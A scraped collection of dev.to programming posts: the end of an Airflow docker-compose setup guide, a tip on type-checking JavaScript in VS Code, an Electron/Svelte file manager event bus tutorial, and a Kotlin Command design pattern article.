- 6379:6379
healthcheck:
test: ["CMD", "redis-cli", "ping"]
interval: 5s
timeout: 30s
retries: 50
restart: always
af-websrv:
container_name: af-websrv
<<: *airflow-common
command: webserver
ports:
- 28080:8080
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
interval: 10s
timeout: 10s
retries: 5
restart: always
af-sch:
container_name: af-sch
<<: *airflow-common
command: scheduler
healthcheck:
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
interval: 10s
timeout: 10s
retries: 5
restart: always
af-w:
container_name: af-w
<<: *airflow-common
command: celery worker
healthcheck:
test:
- "CMD-SHELL"
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
interval: 10s
timeout: 10s
retries: 5
restart: always
af-int:
container_name: af-int
<<: *airflow-common
command: version
environment:
<<: *airflow-common-env
_AIRFLOW_DB_UPGRADE: 'true'
_AIRFLOW_WWW_USER_CREATE: 'true'
af-flower:
container_name: af-flower
<<: *airflow-common
command: celery flower
ports:
- 5555:5555
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
interval: 10s
timeout: 10s
retries: 5
restart: always
af-gitsync:
container_name: af-gitsync
image: k8s.gcr.io/git-sync/git-sync:v3.2.2
environment:
- GIT_SYNC_REV=HEAD
- GIT_SYNC_DEPTH=1
- GIT_SYNC_USERNAME=airflow
- GIT_SYNC_MAX_FAILURES=0
- GIT_KNOWN_HOSTS=false
- GIT_SYNC_DEST=repo
- GIT_SYNC_REPO=https://cloudopz.co/devops/airflow-dags.git
- GIT_SYNC_WAIT=60
- GIT_SYNC_TIMEOUT=120
- GIT_SYNC_ADD_USER=true
- GIT_SYNC_PASSWORD=
- GIT_SYNC_ROOT=/dags
- GIT_SYNC_BRANCH=master
volumes:
- /mnt/airflow/dags:/dags
volumes:
postgres-db-volume:
```
</details>
3. **Run airflow-init to setup airflow database**
```
docker-compose up airflow-init
```
- Running airflow - Up
```
docker-compose up -d
```
- Read more [Extension fields](https://docs.docker.com/compose/compose-file/compose-file-v3/#extension-fields) to understand docker-compose.yaml contents
## 🚀 Add airflow connectors <a name="Add-airflow-connectors"></a>
- Add slack connection
```
airflow connections add 'airflow-slack' \
--conn-type 'http'
--conn-password '/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' \
--conn-host 'https://hooks.slack.com/services'
```
- We can add connector in UI
<p align="left">
<a href="https://dev.to/vumdao">
<img alt="Airflow Quick Start With docker-compose on AWS EC2" src="https://github.com/vumdao/airflow-docker/blob/master/slack-connection.png?raw=true" width="800" />
</a>
</p>
- We can add connection through env file eg. `.env` in docker-compose
```
AIRFLOW_CONN_MY_POSTGRES_CONN: 'postgresql://airflow:airflow@postgres-pg:5432/airflow'
AIRFLOW_CONN_AIRFLOW_SLACK_CONN: 'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX'
```
## 🚀 Understand airflow parameters in airflow.models <a name="Understand-airflow-parameters-in-airflow.models"></a>
- [airflow.models](https://airflow.apache.org/docs/apache-airflow/stable/_api/airflow/models/index.html)
- `Context`
- `on_failure_callback` (TaskStateChangeCallback) – a function to be called when a task instance of this task fails. a context dictionary is passed as a single parameter to this function. Context contains references to related objects to the task instance and is documented under the macros section of the API.
- `on_execute_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed right before the task is executed.
- `on_retry_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed when retries occur.
- `on_success_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed when the task succeeds.
- `trigger_rule` (str) – defines the rule by which dependencies are applied for the task to get triggered. Options are: { all_success | all_failed | all_done | one_success | one_failed | none_failed | none_failed_or_skipped | none_skipped | dummy} default is all_success. Options can be set as string or using the constants defined in the static class airflow.utils.TriggerRule
---
{% user vumdao %}
{% github vumdao/vumdao no-readme %} | vumdao |
793,335 | VS Code - Get type checking in JavaScript easily | Did you know you can type check JavaScript code in VS Code? VS Code allows you to leverage some of... | 8,215 | 2021-08-16T08:18:24 | https://www.roboleary.net/2021/08/16/vscode-type-checking-for-javascript.html | webdev, javascript, tooling | Did you know you can type check JavaScript code in VS Code?
VS Code allows you to leverage some of TypeScript's advanced type checking and error reporting functionality in plain old JavaScript files. And you can even do some quick fixes! This can be done alongside ESLint without any issues.
The type checking is opt-in. You can apply it to an individual file, per project, or everywhere.
## Enable checking in individual files
If you want to try it out for a file, just add the comment `// @ts-check` to the top of a file. For example, the code below tries to multiply a number with a string.
```javascript
// @ts-check
let x = "blah";
let y = x * 2;
```
You will see red underlining under the offense to point out the error, and you will see the error in the problems tab.

## Enable checking in your workspace or everywhere
You can enable type checking for all JavaScript files with the `JS/TS › Implicit Project Config: Check JS` setting.
Alternatively, you can place a `jsconfig.json` in your root folder, and specify your [JavaScript project options](https://code.visualstudio.com/docs/languages/jsconfig). You can add type checking as a compiler option as below:
```json
{
"compilerOptions": {
"checkJs": true
},
"exclude": ["node_modules", "**/node_modules/*"]
}
```
The advantage of using `jsconfig.json` is that you can target the files you want checked through `include` and `exclude`.
You can use `// @ts-nocheck` to disable type checking inside a file if you want to make an exception also.
## Add extra type checking with JSDoc comments
[JSDoc](https://jsdoc.app/) annotations are used to describe your code and generate documentation. Part of that specification is to add types to variables, through this we get can extra type checking in VS Code.
JSDoc annotations come before a declaration in a comment block. In the example below, I specify a type for the parameter and the return value.

You can see it catches a mistake when I provide a number as argument for the function call `isHoriztonalRule(1)`.
You can find the full list of supported JSDoc patterns in: [TypeScript Reference - JSDoc Supported Types](https://www.typescriptlang.org/docs/handbook/jsdoc-supported-types.html).
## Conclusion
Getting type checking in JavaScript is pretty sweet. It is simple and flexible to use. It provides some of the benefits of TypeScript without needing to convert a codebase to TypeScript.
Happy hacking!
| robole |
807,339 | Electron Adventures: Episode 36: File Manager Event Bus | It's time to bring what we learned into our app. The first step will be adding event bus from episode... | 14,346 | 2021-08-29T20:56:51 | https://dev.to/taw/electron-adventures-episode-36-file-manager-event-bus-g84 | javascript, electron, svelte | It's time to bring what we learned into our app. The first step will be adding event bus from episode 33 to file manager we last worked on in episode 32.
And while we're doing this, we'll also be refactoring the codebase.
### `src/EventBus.js`
We can setup event bus identical to what we already did.
I'm sort of considering adding some syntactic sugar support at some point so we can replace `eventBus.emit("app", "activatePanel", panelId)` by `eventBus.app.activatePanel(panelId)` using [`Proxy` objects](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Proxy). That would be super easy in Ruby, but a bit complex with JS.
```javascript
export default class EventBus {
constructor() {
this.callbacks = {}
}
handle(target, map) {
this.callbacks[target] = { ...(this.callbacks[target] || {}), ...map }
}
emit(target, event, ...details) {
let handlers = this.callbacks[target]
if (handlers) {
if (handlers[event]) {
handlers[event](...details)
} else if (handlers["*"]) {
handlers["*"](event, ...details)
}
}
}
}
```
### `src/commands.js`
Previously we had the list of commands copied and pasted multiple times between keyboard handler, application menu, and command palette. We don't have application menu and command palette yet, but we can preempt this issue by extracting it to a separate file.
```javascript
export default [
{key: "Tab", action: ["app", "switchPanel"]},
{key: "F10", action: ["app", "quit"]},
{key: "ArrowDown", action: ["activePanel", "nextItem"]},
{key: "ArrowUp", action: ["activePanel", "previousItem"]},
{key: "PageDown", action: ["activePanel", "pageDown"]},
{key: "PageUp", action: ["activePanel", "pageUp"]},
{key: "Home", action: ["activePanel", "firstItem"]},
{key: "End", action: ["activePanel", "lastItem"]},
{key: " ", action: ["activePanel", "flipItem"]},
{key: "Enter", action: ["activePanel", "activateItem"]},
]
```
### `src/Keyboard.svelte`
With event bus and commands list extracted, `Keyboard` component is very simple. We'll need to change it to support modifier keys like Cmd, and maybe to disable shortcuts when modal panels are open, but even then it will be very simple component.
```html
<script>
import commands from "./commands.js"
import { getContext } from "svelte"
let { eventBus } = getContext("app")
function handleKey(e) {
for (let command of commands) {
if (command.key === e.key) {
e.preventDefault()
eventBus.emit(...command.action)
}
}
}
</script>
<svelte:window on:keydown={handleKey} />
```
### `src/Footer.svelte`
The only change is using `eventBus` to tell the app to quit instead of handling that locally. As we're adding functionality, we'll be adding similar handlers to other buttons. Of course at some point we can go fancy, and make the footer context-aware.
```html
<script>
import { getContext } from "svelte"
let { eventBus } = getContext("app")
</script>
<footer>
<button>F1 Help</button>
<button>F2 Menu</button>
<button>F3 View</button>
<button>F4 Edit</button>
<button>F5 Copy</button>
<button>F6 Move</button>
<button>F7 Mkdir</button>
<button>F8 Delete</button>
<button on:click={() => eventBus.emit("app", "quit")}>F10 Quit</button>
</footer>
<svelte:window />
<style>
footer {
text-align: center;
grid-area: footer;
}
button {
font-family: inherit;
font-size: inherit;
background-color: #66b;
color: inherit;
}
</style>
```
### `src/App.svelte`
And the main component. First template and styling, very little changed, we just added `Keyboard` and got rid of some `Panel` props:
```html
<div class="ui">
<header>
File Manager
</header>
<Panel initialDirectory={initialDirectoryLeft} id="left" />
<Panel initialDirectory={initialDirectoryRight} id="right" />
<Footer />
</div>
<Keyboard />
<style>
:global(body) {
background-color: #226;
color: #fff;
font-family: monospace;
margin: 0;
font-size: 16px;
}
.ui {
width: 100vw;
height: 100vh;
display: grid;
grid-template-areas:
"header header"
"panel-left panel-right"
"footer footer";
grid-template-columns: 1fr 1fr;
grid-template-rows: auto minmax(0, 1fr) auto;
}
.ui header {
grid-area: header;
}
header {
font-size: 24px;
margin: 4px;
}
</style>
```
The script part does a bit more:
```html
<script>
import { writable } from "svelte/store"
import { setContext } from "svelte"
import Panel from "./Panel.svelte"
import Footer from "./Footer.svelte"
import EventBus from "./EventBus.js"
import Keyboard from "./Keyboard.svelte"
let eventBus = new EventBus()
let activePanel = writable("left")
setContext("app", {eventBus, activePanel})
let initialDirectoryLeft = window.api.currentDirectory()
let initialDirectoryRight = window.api.currentDirectory() + "/node_modules"
function switchPanel() {
if ($activePanel === "left") {
activePanel.set("right")
} else {
activePanel.set("left")
}
}
function activatePanel(panel) {
activePanel.set(panel)
}
function quit() {
window.close()
}
function emitToActivePanel(...args) {
eventBus.emit($activePanel, ...args)
}
eventBus.handle("app", {switchPanel, activatePanel, quit})
eventBus.handle("activePanel", {"*": emitToActivePanel})
</script>
```
We register three commands - `switchPanel`, `activatePanel`, and `quit`. We also setup forwarding of `activePanel` events to either `left` or `right` panel.
For context we expose just two things - `activePanel` and `eventBus`. And I'm not even sure about exposing `activePanel`. Right now passing `true`/`false` to each `Panel` would work just as well. I might revisit this later.
### `src/File.svelte`
`Panel` was already getting very complicated, so I started by extracting `File` component out of it. It represents a single entry in the panel.
```html
<div
class="file"
class:focused={focused}
class:selected={selected}
on:click|preventDefault={() => onclick()}
on:contextmenu|preventDefault={() => onrightclick()}
on:dblclick|preventDefault={() => ondoubleclick()}
bind:this={node}
>
{filySymbol(file)}{file.name}
</div>
<style>
.file {
cursor: pointer;
}
.file.selected {
color: #ff2;
font-weight: bold;
}
:global(.panel.active) .file.focused {
background-color: #66b;
}
</style>
```
There are two new things here. First is `bind:this={node}`. We expose `node` as a bindable property, so parent can access to our DOM node. This is generally not the best pattern, so maybe we can figure out something less intrusive later.
The other new thing is `:global(.panel.active) .file.focused` selector. Svelte selectors are all automatically rewritten to only match elements created by the current component - there's an extra class automatically added by every component, and `.file.selected` is actually `.createdByFileComponent.file.selected` (except it's a hash not `createdByFileComponent`).
This is what we want 90% of the time, but in this case we want a special styling rule based on which context the element is in. `.panel.active .file.focused` won't ever work as the `panel` wasn't created here. There are two ways to do this - either pass some props to the component describing the context (`export let inActivePanel` etc.), so styling can be self contained. Or use `:global(selector)` to disable this rule for just this one selector. Everything else in the styling is still component-scoped.
And now the code:
```html
<script>
import { getContext } from "svelte"
export let file
export let idx
export let panelId
export let focused
export let selected
export let node = undefined
let {eventBus} = getContext("app")
function onclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
}
function onrightclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
eventBus.emit(panelId, "flipSelected", idx)
}
function ondoubleclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
eventBus.emit(panelId, "activateItem")
}
function filySymbol(file) {
if (file.type === "directory") {
if (file.linkTarget) {
return "~"
} else {
return "/"
}
} else if (file.type === "special") {
return "-"
} else {
if (file.linkTarget) {
return "@"
} else {
return "\xA0" //
}
}
}
</script>
```
We handle all events locally, by translating them into a series of `app` and `panelId` events. I'm sort of wondering about using some `Proxy` objects so I could instead write it like this:
```javascript
function onclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
}
function onrightclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
eventBus[panelId].flipSelected(idx)
}
function ondoubleclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
eventBus[panelId].activateItem()
}
```
Or even:
```javascript
let app = eventBus.app
let panel = eventBus[panelId]
function onclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
}
function onrightclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
panel.flipSelected(idx)
}
function ondoubleclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
panel.activateItem()
}
```
That would be nicer, right?
A minor thing to note is `export let node = undefined`. As `node` is export-only property we explicitly mark it as such to avoid warning in development mode. Other than that, it works the same as not having `= undefined`.
### `src/Panel.svelte`
`Panel` svelte got slimmed down thanks to some code moving down to `File` component. Let's start with template and styling:
```html
<div class="panel {id}" class:active={active}>
<header>{directory.split("/").slice(-1)[0]}</header>
<div class="file-list" bind:this={fileListNode}>
{#each files as file, idx}
<File
panelId={id}
file={file}
idx={idx}
focused={idx === focusedIdx}
selected={selected.includes(idx)}
bind:node={fileNodes[idx]}
/>
{/each}
</div>
</div>
<style>
.left {
grid-area: panel-left;
}
.right {
grid-area: panel-right;
}
.panel {
background: #338;
margin: 4px;
display: flex;
flex-direction: column;
}
header {
text-align: center;
font-weight: bold;
}
.file-list {
flex: 1;
overflow-y: scroll;
}
</style>
```
The only unusual thing is `bind:node={fileNodes[idx]}`. `File` component exports its main DOM node in `node` instance variable, and we then store it in `fileNodes[idx]`.
The script is fairly long, but it's basically what we already had before, except now we register various functions with `eventBus`:
```html
<script>
import File from "./File.svelte"
import { getContext, tick } from "svelte"
export let initialDirectory
export let id
let directory = initialDirectory
let initialFocus
let files = []
let selected = []
let focusedIdx = 0
let fileNodes = []
let fileListNode
let {eventBus, activePanel} = getContext("app")
$: active = ($activePanel === id)
$: filesPromise = window.api.directoryContents(directory)
$: filesPromise.then(x => {
files = x
selected = []
setInitialFocus()
})
$: filesCount = files.length
$: focused = files[focusedIdx]
let flipSelected = (idx) => {
if (selected.includes(idx)) {
selected = selected.filter(f => f !== idx)
} else {
selected = [...selected, idx]
}
}
let setInitialFocus = async () => {
focusedIdx = 0
if (initialFocus) {
focusedIdx = files.findIndex(x => x.name === initialFocus)
if (focusedIdx === -1) {
focusedIdx = 0
}
} else {
focusedIdx = 0
}
await tick()
scrollFocusedIntoView()
}
let scrollFocusedIntoView = () => {
if (fileNodes[focusedIdx]) {
fileNodes[focusedIdx].scrollIntoViewIfNeeded(true)
}
}
let focusOn = (idx) => {
focusedIdx = idx
if (focusedIdx > filesCount - 1) {
focusedIdx = filesCount - 1
}
if (focusedIdx < 0) {
focusedIdx = 0
}
scrollFocusedIntoView()
}
function pageSize() {
if (!fileNodes[0] || !fileNodes[1] || !fileListNode) {
return 16
}
let y0 = fileNodes[0].getBoundingClientRect().y
let y1 = fileNodes[1].getBoundingClientRect().y
let yh = fileListNode.getBoundingClientRect().height
return Math.floor(yh / (y1 - y0))
}
function activateItem() {
if (focused?.type === "directory") {
if (focused.name === "..") {
initialFocus = directory.split("/").slice(-1)[0]
directory = directory.split("/").slice(0, -1).join("/") || "/"
} else {
initialFocus = null
directory += "/" + focused.name
}
}
}
function nextItem() {
focusOn(focusedIdx + 1)
}
function previousItem() {
focusOn(focusedIdx - 1)
}
function pageDown() {
focusOn(focusedIdx + pageSize())
}
function pageUp() {
focusOn(focusedIdx - pageSize())
}
function firstItem() {
focusOn(0)
}
function lastItem() {
focusOn(filesCount - 1)
}
function flipItem() {
flipSelected(focusedIdx)
nextItem()
}
eventBus.handle(id, {nextItem, previousItem, pageDown, pageUp, firstItem, lastItem, flipItem, activateItem, focusOn, flipSelected, activateItem})
</script>
```
### Result
(image)

The next step is adding command palette, hopefully looking a bit better than what we had the last time.
As usual, [all the code for the episode is here](https://github.com/taw/electron-adventures/tree/master/episode-36-file-manager-event-bus).
| taw |
808,830 | Command Pattern in Kotlin | Purpose The Command pattern wraps the request into a specific object that has all the... | 12,513 | 2021-08-31T08:26:15 | https://asvid.github.io/kotlin-command-pattern | kotlin, designpatterns, command, coroutines | ## Purpose
The Command pattern wraps the request into a specific object that has all the information necessary to perform its task. You can think of it as the next stage of refactoring, where at first we extract the code to a separate method, and then to a separate object, taking the arguments needed to execute the request in the constructor.
Since the request is an object, it can be sent to a separate object (`CommandProcessor`) for execution, which allows for their queuing and facilitates logging events. The same command can be used in different places in the system, encapsulating the entire logic of the request execution, which prevents code duplication. It does not have to be the same instance, but the class.
The request object, in addition to the standard `execute()` method, may contain a method like `undo()`, i.e. undoing the changes made by the request. Virtually all graphics programs or word processors have this option. They could be storing each change in the form of `Command` in some buffer with limited capacity (hence the possibility of e.g. only 3 undos), and if the user wants to undo the last change made, the`Command` is pulled from the buffer and the changes made by it are undone.
## Implementation
### Abstract
As already mentioned, by default the `Command` object has an `execute()` (or equivalent) method. There are several other classes in this pattern:
- **Receiver** - object used by the `Command` to complete its task. If the `Command` is to download the weather from the internet,` Receiver` will be an HTTP client, for example. It can be any class in your system.
- **Invoker** - the class using the `Command`
- **Client** - creates the `ConcreteCommand` instance and binds it with the `Receiver` and sets it in the`Invoker`
- **ConcreteCommand** - specific command. It has all the other objects needed to complete the task.
The order of interactions looks like this:

1. The `Client` creates the instance of the specific `Command`, passing the receiver `Receiver`.
2. `Invoker` gets a specific instance of the command.
3. The `Invoker` uses the `execute()` method of the command instance to do its own thing. For example, this could be to perform an action "on click" if `Invoker` is a UI button.
4. The `Command` calls the appropriate methods of its `Receiver`.
In such generic form it can be implemented like this:
```kotlin
// generic Command interface
// binding the Receiver class in the generic interface allows grouping commands in a way
// e.g. related to text editing, graphic editor or HTTP requests
// it's not required by the pattern itself
abstract class Command(val receiver: Receiver) {
abstract fun execute()
}
// concrete Command taking Refceiver in the constructor
class ConcreteCommand(receiver: Receiver) : Command(receiver) {
override fun execute() {
println("executing ConcreteCommand")
// calling action on Recveiver to perform a task
receiver.action()
}
}
// the "true" action performer, knowing implementation details
// e.g. text editor or HTTP client
class Receiver {
fun action() {
println("performing action in Receiver")
}
}
// class using the passed Command
// e.g. UI button calling Command when clicked
class Invoker {
private lateinit var aCommand: Command
fun setCommand(command: Command) {
aCommand = command
}
fun performAction() {
aCommand.execute()
}
}
// class connecting Receiver, Command and Invoker
class Client(invoker: Invoker) {
private val receiver = Receiver()
init {
// setting the Invoker command
val concreteCommand = ConcreteCommand(receiver)
invoker.setCommand(concreteCommand)
}
}
fun main() {
val invoker = Invoker()
Client(invoker)
invoker.performAction()
}
```
#### Return Result
The command may return some value. However, this will not always be a good practice. While returning `Success/Failure` will usually be OK to inform the calling class about the command execution status, returning some specific data will conflict with the `CQRS` - command query responsibility segregation approach. The point is that the command either changes something or returns data.
Let's take this situation: you display a list of names, each list item can be edited and the name is changed. A name change is encapsulated in a command that operates on some data repository. Should such command return anything, and if so, what exactly? The whole list of names with the updated name? What if list is paged, do you return just the page with the updated item, or whole list of items up to this item? Or should the command return the changed name itself, so then `Invoker` has to update the displayed list. But then you have 2 representations of the names list: one in the repository and second one in the view, even if values are the same (but there is nothing to guarantee this).
It's better if the command returns simple `Success`, which will cause the view to download the current list of names from the repository or show errors message. Or better yet, if the view always keeps its list up-to-date with repository by some sort of `data-binding` or `Observer`. After executing the command, the list will update itself, and you don't even need to return any `Success/Failure` from the command, unless you need to handle the error.
Another way may be to pass some callback in the `execute()`, but maybe let's not go that way :)
```kotlin
// command result nicely fits with `sealed class`
sealed class CommandResult {
// returned values could be `object` if they don't contain any data
class Success : CommandResult()
class Fail : CommandResult()
}
// `interface` instead of `abstract class` this time, no forced `Receiver` type in the constructor
interface Command {
fun execute(): CommandResult
}
// `Receiver` appears just here
class ConcreteCommand(private val receiver: Receiver) : Command {
// executing the command returns a result
override fun execute(): CommandResult {
println("executing ConcreteCommand")
// that depends on Receiver response
return if (receiver.action()) {
CommandResult.Success()
} else {
CommandResult.Fail()
}
}
}
// `Receiver` that returns random Boolean
class Receiver {
fun action(): Boolean {
println("performing action in Receiver")
return Random.nextBoolean()
}
}
fun main() {
val receiver = Receiver()
// no `Invoker` in this example, invoking is simply in `main()`
val result = ConcreteCommand(receiver).execute()
println("Command result is: $result")
}
```
#### CommandProcessor
Closing the entire command in an object allows it to be passed to the external `Processor` instead of being executed immediately. The `Processor` can queue and execute commands according to its internal logic, but from the `Invoker` point of view, it doesn't really matter. The `Receiver` can be moved from a command to the `Processor`, thus the commands will only take its parameters, and the rest will be handled by `Processor` when calling the `execute()`.
However, make sure that the `execute()` method always has the same signature, and you do not have to implement special handling inside the `Processor` due to the type of the command. As long as `Command` and `Processor` are in the same domain (e.g. HTTP requests to a specific API, sending messages via Bluetooth), there should be no problems with that. If a given `Processor` needs to pass different `Receiver` type when executing commands, it may suggest that they should go to a different `Processor`.
```kotlin
// util to generate random delays in suspended methods
fun randomDelay() = Random.nextLong(1000, 3000)
interface Command {
// Receiver is passed at the execute() call, not sooner
suspend fun execute(receiver: Receiver)
}
// commands take only parameters, without Receiver
class FirstCommand(private val param: Int) : Command {
override suspend fun execute(receiver: Receiver) {
println("executing FirstCommand $param")
receiver.action()
}
}
class SecondCommand(private val param: String) : Command {
override suspend fun execute(receiver: Receiver) {
println("executing SecondCommand $param")
receiver.action()
}
}
class Receiver {
// running Receivers action may take a while, thus `suspend` and `delay()` to mimic that
suspend fun action() {
println("performing action in Receiver")
delay(randomDelay())
println("action finished!")
}
}
// the most important class in this example
// it has the Receiver instance used by the commands
// commands are stored in FIFO queue in the form of `Channel`
object CommandProcessor {
private val commands = Channel<Command>()
// using separate Scopes for adding and executing commands solves blocking one by another
private val processScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val executeScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val receiver = Receiver()
fun process(command: Command) {
processScope.launch {
println("adding $command to the queue")
commands.send(command)
}
}
init {
// waiting for new commands in the queue and executing them as soon as they come
executeScope.launch {
for (command in commands) {
command.execute(receiver)
}
}
}
}
// Invoker without changes
class Invoker {
private lateinit var aCommand: Command
fun setCommand(command: Command) {
aCommand = command
}
fun performAction() {
CommandProcessor.process(aCommand)
}
}
fun main() {
val firstInvoker = Invoker()
val secondInvoker = Invoker()
// no Receiver here, just command parameters
firstInvoker.setCommand(FirstCommand(1))
secondInvoker.setCommand(SecondCommand("2"))
// invoking actions 10x
repeat(10) {
firstInvoker.performAction()
secondInvoker.performAction()
}
}
```
The `CommandProcessor` is an object that processes commands sent to it. Adding new commands does not block their execution because it runs in separate scope. In this case, commands that return nothing will work best. You just throw them on the queue, and the command effect (if needed) should come through a different channel, as in a proper `CQRS`. Queue and thread management is on the `Processor` side, the `Invoker` doesn't have to deal with it, or even know if there are `coroutines`, Java threads or some `RX`. Commands are executed sequentially, one after the other. Combined with `delay()` for the Receiver action, this has the effect of immediately adding commands to the queue, and laboriously executing them.
Queue commands execution can also be done in parallel with multiple `launchProcessors` taking `Channel` as parameter:
```kotlin
// IRL this would be provided by DI, but for the sake of example `object` will do
object CommandProcessor {
// no changes here
private val commands = Channel<Command>()
private val processScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val executeScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val receiver = Receiver()
fun process(command: Command) {
processScope.launch {
delay(randomDelay())
println("adding $command to the queue")
commands.send(command)
}
}
init {
executeScope.launch {
// starting 5 internal command processors, working on the same queue
// so there can be 5 commands executed at the same time
repeat(5) {
launchProcessor(commands)
}
}
}
// private `extension function` that alows multiple consumers take commands from the same queue
// each command is executed only once
// after execution is done, the processor is taking next item from the queue
private fun CoroutineScope.launchProcessor(channel: ReceiveChannel<Command>) = launch {
for (command in channel) {
command.execute(receiver)
}
}
}
```
But this will also mean that i.e. if `Command 1` takes longer to execute than `Command 2`, the latter will be finished sooner which may not always be a good thing. It depends heavily on the case.
#### Undo
Commands may have a method that allows undoing the changes they have made, i.e. `undo()` known from graphic or text editors. The implementation will strongly depend on the case, but it can be assumed that the command remembers the state before the change and restores it, if necessary. Holding multiple states in history eats memory and therefore the history buffer is often limited to the last 3 commands (or similar). Undo execution of a command can also be achieved by executing a command with the opposite parameters, then there is no need to hold the state, and the execution of `undo()` itself can be saved in the history. Undoed commands may end up in a separate buffer, allowing them to be executed again with `redo()`.
Strongly simplified example of `undo()` with keeping the before-execution state:
```kotlin
// generic command of drawing "something" on the `Canvas`
abstract class DrawCommand(private val canvas: Canvas) {
// state before executing command - the list of already drawn elements
private var preCommandState = listOf<Shape>()
abstract fun execute()
// saving the state
fun saveState() {
preCommandState = canvas.shapes.toList()
}
// undoing the command, so setting Canvas state from before exectuion
fun undo() {
println("undo ${this}")
canvas.shapes = preCommandState.toMutableList()
}
}
// drawable shapes interfaces
interface Shape
data class Line(val length: Int) : Shape
data class Circle(val diameter: Int) : Shape
// commands for drawing shapes, taking params and Receiver (Canvas)
class DrawLine(private val length: Int, private val canvas: Canvas) : DrawCommand(canvas) {
override fun execute() {
saveState()
canvas.draw(Line(length))
}
}
class DrawCircle(private val diameter: Int, private val canvas: Canvas) : DrawCommand(canvas) {
override fun execute() {
saveState()
canvas.draw(Circle(diameter))
}
}
// Receiver
class Canvas {
// current canvas state
var shapes: MutableList<Shape> = mutableListOf()
// drawing a shape on Canvas means adding it to the list of shapes
fun draw(shape: Shape) {
println("drawing a $shape")
shapes.add(shape)
}
}
fun main() {
val canvas = Canvas()
val commandsHistory = mutableListOf<DrawCommand>()
// after executing the command its being preserved in history
val drawLine = DrawLine(2, canvas)
drawLine.execute()
commandsHistory.add(drawLine)
val drawCircle = DrawCircle(1, canvas)
drawCircle.execute()
commandsHistory.add(drawCircle)
val drawLongLine = DrawLine(10, canvas)
drawLongLine.execute()
commandsHistory.add(drawLongLine)
val drawBigCircle = DrawCircle(12, canvas)
drawBigCircle.execute()
commandsHistory.add(drawBigCircle)
println("current shapes: ${canvas.shapes}")
println("--- undo last 2 ---")
// reverting last 2 commands
commandsHistory.removeLast().undo()
commandsHistory.removeLast().undo()
println("current shapes: ${canvas.shapes}")
}
```
#### Why not just use lambdas?
It may seem that creating a whole class and then an object to perform some action is a redundancy, and that the same functionality and readability can be achieved using lambdas.
Example using a similar processor from the previous case:
```kotlin
fun main() {
// command uses Receiver when its executed
val command = { receiver: Receiver ->
println("this is a command to do stuff")
receiver.action()
}
repeat(10) {
CommandProcessor.process(command)
// lambda-commands don't need to be assigned to variables
CommandProcessor.process { receiver: Receiver ->
println("this is a another command")
receiver.action()
}
}
}
```
We tell the `CommandProcessor`: execute this block using your `Receiver` instance. However, we lose the ability to parameterize command objects. Lambda can take parameters, but they will be used at runtime, which is in the `CommandProcessor`. Of course, they can be passed in the `process ()` method, but then it is difficult to talk about command encapsulation if you have a block of code in one place and parameters need to be passed in another.
If the `action()` method were `suspend`, it would need to be handled in the lambda block, wrapping the call in some `CoroutineScope`. It could come from `CommandProcessor` just like the `Receiver` but this is another complication that occurs when Lambda is created.
To sum up: if you want to have a parameterized Lambda, passed to the processor and use it in multiple places of the system - **create a class**.
### Home Automation example
It may be my professional bias, but controlling remote devices is perfect for a real-life example of using the `Command` pattern.
Lets have some devices that can be turned ON or OFF and a remote control to set these devices. The remote control is not directly connected to any specific device, it can control any of them, or multiple at the same time. The remote is also not aware of the device it's controlling, it just handles pressing its buttons.
```kotlin
// Invoker, takes commands in the constructor, but it could also use setters
class RemoteController(
private val firstButtonAction: Command,
private val secondButtonAction: Command,
) {
fun firstButtonClicked() {
firstButtonAction.execute()
}
fun secondButtonClicked() {
secondButtonAction.execute()
}
}
interface Command {
fun execute()
}
// Receiver
class Device(private val name: String) {
// action
fun switch(on: Boolean) {
println("turning device $name ${if (on) "ON" else "OFF"}")
}
}
// concrete command thaking Receiver in the constructor
class TurnOnCommand(private val device: Device) : Command {
override fun execute() {
// and calling a method according to its task
device.switch(true)
}
}
class TurnOffCommand(private val device: Device) : Command {
override fun execute() {
device.switch(false)
}
}
fun main() {
// Receiver instance
val lightBulb = Device("living room light")
// passed to the commands
val turnOn: Command = TurnOnCommand(lightBulb)
val turnOff: Command = TurnOffCommand(lightBulb)
// Invoker (the remote) gets commands for its buttons
val remote = RemoteController(turnOn, turnOff)
// but Invoker itself is just executing the commands, has no idea which device its controlling and how
remote.firstButtonClicked()
remote.secondButtonClicked()
}
```
## Naming
Adding the `Command` suffix to the names of specific commands seems to make sense. It clearly defines what the class is used for. In the case of the `Receiver` or `Invoker`, which by nature already have their specific tasks and just found themselves in this pattern kinda "by the way" would only be confusing. You can see that in the last example of *Home Automation*.
## Summary
The `Command` is one of my favorite patterns, most of the time I have used it with some form of `CommandProcessor`. It perfectly encapsulates the request and allows it to be moved and reused. It facilitates refactoring because it is easy to replace one command with another, or to change the internal implementation without affecting the clients of it.
Command objects can contain a method to undo the changes they made. This is done by keeping the state of the `Receiver` before executing the command, or by executing the command with opposite parameters. Reverted commands can be put on a separate buffer, which allows them to be redone if necessary.
